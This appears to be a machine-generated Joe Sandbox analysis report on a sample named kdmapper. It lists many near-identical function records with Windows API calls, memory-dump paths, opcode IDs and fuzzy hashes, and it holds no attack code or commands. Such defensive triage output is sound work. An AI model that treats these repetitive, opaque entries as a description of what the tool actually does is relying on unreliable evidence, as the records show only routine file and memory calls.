                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: (c
                                                                                                                                                                          • API String ID: 1269201914-4066220940
                                                                                                                                                                          • Opcode ID: 764b99e8185b1e1b1ae8ef8b08c87b3bfbffbb0fb46f897fc289423e42cbc81b
                                                                                                                                                                          • Instruction ID: dd3c3c356355a896e78d1c60713c5afb06c77b6d5e433b480f44decfcc91c50c
                                                                                                                                                                          • Opcode Fuzzy Hash: 764b99e8185b1e1b1ae8ef8b08c87b3bfbffbb0fb46f897fc289423e42cbc81b
                                                                                                                                                                          • Instruction Fuzzy Hash: E4A011C2AA8A02BC300822802C02C3B020FC0C2F3AB30882EF802800C0A8820C8A08B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E51F
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: (c
                                                                                                                                                                          • API String ID: 1269201914-4066220940
                                                                                                                                                                          • Opcode ID: 0d7b5da8d7329c53d5995a10304e850ff93d73fc61e2983f693f16203a7e1235
                                                                                                                                                                          • Instruction ID: dd3c3c356355a896e78d1c60713c5afb06c77b6d5e433b480f44decfcc91c50c
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d7b5da8d7329c53d5995a10304e850ff93d73fc61e2983f693f16203a7e1235
                                                                                                                                                                          • Instruction Fuzzy Hash: E4A011C2AA8A02BC300822802C02C3B020FC0C2F3AB30882EF802800C0A8820C8A08B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E51F
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: (c
                                                                                                                                                                          • API String ID: 1269201914-4066220940
                                                                                                                                                                          • Opcode ID: 33cefe8bce223f9a85c1f52b483b14a54ebe1458ed8be7ad172fed8bd4c846b6
                                                                                                                                                                          • Instruction ID: dd3c3c356355a896e78d1c60713c5afb06c77b6d5e433b480f44decfcc91c50c
                                                                                                                                                                          • Opcode Fuzzy Hash: 33cefe8bce223f9a85c1f52b483b14a54ebe1458ed8be7ad172fed8bd4c846b6
                                                                                                                                                                          • Instruction Fuzzy Hash: E4A011C2AA8A02BC300822802C02C3B020FC0C2F3AB30882EF802800C0A8820C8A08B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E580
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: F0wnc
                                                                                                                                                                          • API String ID: 1269201914-3598844980
                                                                                                                                                                          • Opcode ID: 03226dffed809b503bfcd7f2056f2ff8918a7f7ece78ecb78dd8acbeadec5c1e
                                                                                                                                                                          • Instruction ID: 75fc5f411fcf7f140b345cbd270efa376af2f1246bf61b6d090c9afbbe075317
                                                                                                                                                                          • Opcode Fuzzy Hash: 03226dffed809b503bfcd7f2056f2ff8918a7f7ece78ecb78dd8acbeadec5c1e
                                                                                                                                                                          • Instruction Fuzzy Hash: 6AA011C2AA8202BC300822A02C02C3B020FC0C2B3AB32882EF802800C0A882080A08B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E580
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: F0wnc
                                                                                                                                                                          • API String ID: 1269201914-3598844980
                                                                                                                                                                          • Opcode ID: b6222eed6f21f29f968fe2efc321ec38224e3da24c0aaed3a17e6548ef5536c9
                                                                                                                                                                          • Instruction ID: 75fc5f411fcf7f140b345cbd270efa376af2f1246bf61b6d090c9afbbe075317
                                                                                                                                                                          • Opcode Fuzzy Hash: b6222eed6f21f29f968fe2efc321ec38224e3da24c0aaed3a17e6548ef5536c9
                                                                                                                                                                          • Instruction Fuzzy Hash: 6AA011C2AA8202BC300822A02C02C3B020FC0C2B3AB32882EF802800C0A882080A08B0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0064B7BB: GetOEMCP.KERNEL32(00000000,?,?,0064BA44,?), ref: 0064B7E6
                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0064BA89,?,00000000), ref: 0064BC64
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,0064BA89,?,?,?,0064BA89,?,00000000), ref: 0064BC77
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                          • Opcode ID: f2ae3dfd2f3be7837ad5ff7df35b889fec35ee0bf87ad56fb6215226d2745948
                                                                                                                                                                          • Instruction ID: a3849fd590fdf781115c4dd3d86fe6392f111009235eec4298de45f9136d7a9d
                                                                                                                                                                          • Opcode Fuzzy Hash: f2ae3dfd2f3be7837ad5ff7df35b889fec35ee0bf87ad56fb6215226d2745948
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B51F070E042459EDB249F75C8816FABBE7EF41300F1864AED4968B362D735DA46CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00629A50,?,?,00000000,?,?,00628CBC,?), ref: 00629BAB
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00628411,-00009570,00000000,000007F3), ref: 00629BB6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                          • Opcode ID: b3e67096d03d478f74e2120afee76bf43eb6ffbab474a60d9c1a46fabde62dd9
                                                                                                                                                                          • Instruction ID: c442703e9ebad3b05659aaf31a9f2bafba467c57370be1cdb045260e1a693718
                                                                                                                                                                          • Opcode Fuzzy Hash: b3e67096d03d478f74e2120afee76bf43eb6ffbab474a60d9c1a46fabde62dd9
                                                                                                                                                                          • Instruction Fuzzy Hash: 4841AC31904B218BDB24DF15F5844ABB7E7FBD4712F148A2DE891833A0D770AD458EB1
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00621E55
                                                                                                                                                                            • Part of subcall function 00623BBA: __EH_prolog.LIBCMT ref: 00623BBF
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00621EFD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2838827086-0
                                                                                                                                                                          • Opcode ID: c1b4e7ce4990a47fb48e2d24b38602ed6b643eda3cacffc7e854df4126a9f016
                                                                                                                                                                          • Instruction ID: 28dec223d924136d4af93c8e86d0597d9033d3f4de9d0bf7949c77dbd5549a3e
                                                                                                                                                                          • Opcode Fuzzy Hash: c1b4e7ce4990a47fb48e2d24b38602ed6b643eda3cacffc7e854df4126a9f016
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B316B719086199FCF51EF98E945AEEFBF6AF19300F20006EE885AB251C7365E01CF64
                                                                                                                                                                          APIs
                                                                                                                                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,006273BC,?,?,?,00000000), ref: 00629DBC
                                                                                                                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00629E70
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$BuffersFlushTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1392018926-0
                                                                                                                                                                          • Opcode ID: 22b228b3a9040fa1ac5927d5a7e879767bed727eb234e16b8ff9b2cd7f3155ce
                                                                                                                                                                          • Instruction ID: 4462a1e3789f5934f2df3f6cb439534333c0c6f3e27f611e5f06ccb719ae8b29
                                                                                                                                                                          • Opcode Fuzzy Hash: 22b228b3a9040fa1ac5927d5a7e879767bed727eb234e16b8ff9b2cd7f3155ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 3121F231248B659BC714CF34D891AABBBE5AF91704F08481CF4C5C7281D329D90C9FB1
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00629F27,?,?,0062771A), ref: 006296E6
                                                                                                                                                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00629F27,?,?,0062771A), ref: 00629716
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: 6870ae06a4495f7a1ccb474717b498eb97f5cc83c00a9e8322c6c67b59406386
                                                                                                                                                                          • Instruction ID: b44f3c78f2ee97959b8481643cae92833d8c72a0e8cd9007c6c9e7b6b76e12b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 6870ae06a4495f7a1ccb474717b498eb97f5cc83c00a9e8322c6c67b59406386
                                                                                                                                                                          • Instruction Fuzzy Hash: D421FF71004B54AFF3708A65DC89FE7B3DEEB89320F104A18FAD6C62C1C774A8848A71
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00629EC7
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00629ED4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                          • Opcode ID: d91d1d983d03a9117b9616727c6cb9e8e535065d5469e1a0fa345175f76b8f3d
                                                                                                                                                                          • Instruction ID: 8181046b9aeec770d94cb04b35c8cacd317c1dac8373beef97153088d5bfac38
                                                                                                                                                                          • Opcode Fuzzy Hash: d91d1d983d03a9117b9616727c6cb9e8e535065d5469e1a0fa345175f76b8f3d
                                                                                                                                                                          • Instruction Fuzzy Hash: E311E530600B24ABD724DA28E841BE6B7EBAF85370F514A29E592D27D0D770ED45CB70
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00648E75
                                                                                                                                                                            • Part of subcall function 00648E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0064CA2C,00000000,?,00646CBE,?,00000008,?,006491E0,?,?,?), ref: 00648E38
                                                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00661098,006217CE,?,?,00000007,?,?,?,006213D6,?,00000000), ref: 00648EB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$AllocAllocate_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2447670028-0
                                                                                                                                                                          • Opcode ID: 5e6a115fefae6089b901fcfd9d0ae3dadb52bbdbb921a24634ab71840045ac63
                                                                                                                                                                          • Instruction ID: 0c95e4a9569acf624a863b2abcd9c4abde844892995ce282e2bd8710a935d180
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e6a115fefae6089b901fcfd9d0ae3dadb52bbdbb921a24634ab71840045ac63
                                                                                                                                                                          • Instruction Fuzzy Hash: 87F0BB32601216BEDB217B65AC05FEF375B8FC2B70F24412AF914A7292DF70DD0181A4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 006310AB
                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 006310B2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$AffinityCurrentMask
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1231390398-0
                                                                                                                                                                          • Opcode ID: 991411d5c40c3dd276c709d17d162baa451df4da7d4c9a380b4a9e0b6e8e0575
                                                                                                                                                                          • Instruction ID: cc826b847108e71bd12011bbfb47877a2e01ca206b465fb148442f84e1f53f69
                                                                                                                                                                          • Opcode Fuzzy Hash: 991411d5c40c3dd276c709d17d162baa451df4da7d4c9a380b4a9e0b6e8e0575
                                                                                                                                                                          • Instruction Fuzzy Hash: 43E09A32F00259A78F0D8BA49C058EBB2EFEA45245B209179E403EB201FE30EE414AA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A501
                                                                                                                                                                            • Part of subcall function 0062BB03: _wcslen.LIBCMT ref: 0062BB27
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A532
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2673547680-0
                                                                                                                                                                          • Opcode ID: 9dd2cb560941b5dc5a4334e1bfd8c87e2b64c1dccc3aced44b8e924186cb056f
                                                                                                                                                                          • Instruction ID: ba48fa62c09c88c06601aadd4e85d6decd8e5e94afde5450abfc20ec1bf526c4
                                                                                                                                                                          • Opcode Fuzzy Hash: 9dd2cb560941b5dc5a4334e1bfd8c87e2b64c1dccc3aced44b8e924186cb056f
                                                                                                                                                                          • Instruction Fuzzy Hash: 47F030312403297BDF025F60EC45FDA376EAB04786F448455B945E52A0DB71DA94DF50
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNELBASE(000000FF,?,?,0062977F,?,?,006295CF,?,?,?,?,?,00652641,000000FF), ref: 0062A1F1
                                                                                                                                                                            • Part of subcall function 0062BB03: _wcslen.LIBCMT ref: 0062BB27
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0062977F,?,?,006295CF,?,?,?,?,?,00652641), ref: 0062A21F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
